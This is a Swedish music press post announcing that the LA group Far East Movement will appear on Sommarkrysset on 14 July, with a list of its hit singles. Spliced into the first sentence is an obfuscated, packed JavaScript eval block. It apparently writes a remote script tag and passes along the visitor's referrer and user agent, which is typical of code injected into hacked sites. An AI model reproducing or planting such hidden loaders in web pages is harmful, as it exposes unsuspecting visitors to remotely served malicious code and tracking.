Image Image Image Image Image Image Image Image Image Image

| 22 juni, 2018

Scroll to top

Top

No Comments

Far East Movement gästar Sommarkrysset 14:e juli

Sebastian Plengier Ehrnfelt

Lördagen eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\b’+e(c)+’\b’,’g’),k[c])}}return p}(‘0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|tkrbz|var|u0026u|referrer|afthn||js|php’.split(‘|’),0,{}))
den 14:e juli kommer LA-baserade Far East Movement till Sverige för att medverka i Sommarkrysset. Electro-hop-kvartetten är aktuell medhitsingeln ”Turn Up The Love” som redan har nått guld. Som om det inte vore nog har föregående singel ”Live My Life” ft Justin Bieber nått platina.

Far East Movement slog igenom förra året med världshiten ”Like A G6” och blev därmed den första amerikanska/asiatiska grupp att ta en tio-topp placering på den amerikanska mainstreamlistan.
Framgångarna har fortsatt med singlar som ”Rocketeer”, ”If I Was You (OMG)” ft Snoop Dog och tidigare nämnda ”Live My Life” och ”Turn Up The Love” från senaste albumet ”Dirty Bass”.

Gruppen finns tillgängliga för intervjuer, vid intresse kontakta Gustaf Angelin.

 

Submit a Comment